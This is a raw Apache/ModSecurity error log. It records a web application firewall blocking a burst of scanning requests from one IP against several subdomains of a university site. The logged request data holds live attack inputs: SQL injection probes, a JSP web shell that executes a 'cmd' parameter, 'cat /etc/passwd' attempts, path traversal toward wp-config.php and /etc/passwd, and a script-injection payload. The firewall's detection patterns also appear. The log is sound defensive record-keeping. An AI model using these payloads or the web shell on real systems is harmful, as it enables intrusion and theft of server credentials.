[Tue Aug 29 11:47:44.476557 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8WAAAAAR"]
[Tue Aug 29 11:47:44.588566 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjtc3oAAAAX"]
[Tue Aug 29 11:47:45.353067 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjtc3sAAAAX"]
[Tue Aug 29 11:47:45.439893 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAi2yKkAAAAN"]
[Tue Aug 29 11:47:45.462874 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAi2yKoAAAAN"]
[Tue Aug 29 11:47:46.285523 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC90AAAAJ"]
[Tue Aug 29 11:47:46.468232 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC@MAAAAJ"]
[Tue Aug 29 11:47:47.189209 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14c8Co-f0AAAjav4gAAAAV"]
[Tue Aug 29 11:47:47.207263 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7GgAAAAT"]
[Tue Aug 29 11:47:47.247424 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkdu24AAAAO"]
[Tue Aug 29 11:47:47.273883 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkcgSgAAAAM"]
[Tue Aug 29 11:47:47.358812 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7G0AAAAT"]
[Tue Aug 29 11:47:47.387491 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14c8Co-f0AAAjav44AAAAV"]
[Tue Aug 29 11:47:47.798828 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAj119MAAAAa"]
[Tue Aug 29 11:47:48.354416 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkdu3MAAAAO"]
[Tue Aug 29 11:47:48.390416 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkBKoIAAAAb"]
[Tue Aug 29 11:47:48.395409 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjdQQAAAAAZ"]
[Tue Aug 29 11:47:48.416287 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkdu3QAAAAO"]
[Tue Aug 29 11:47:48.422961 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14dMCo-f0AAAkcgTAAAAAM"]
[Tue Aug 29 11:47:48.441394 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjtc4QAAAAX"]
[Tue Aug 29 11:47:48.468051 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkcgTIAAAAM"]
[Tue Aug 29 11:47:48.468071 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjdQQMAAAAZ"]
[Tue Aug 29 11:47:48.487926 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjrbJ8AAAAP"]
[Tue Aug 29 11:47:48.488754 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjFof4AAAAF"]
[Tue Aug 29 11:47:49.382962 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAjCbLIAAAAB"]
[Tue Aug 29 11:47:49.440478 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dcCo-f0AAAkcgTQAAAAM"]
[Tue Aug 29 11:47:49.456833 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAjtc4YAAAAX"]
[Tue Aug 29 11:47:49.457023 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjrbKIAAAAP"]
[Tue Aug 29 11:47:49.493236 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkBKocAAAAb"]
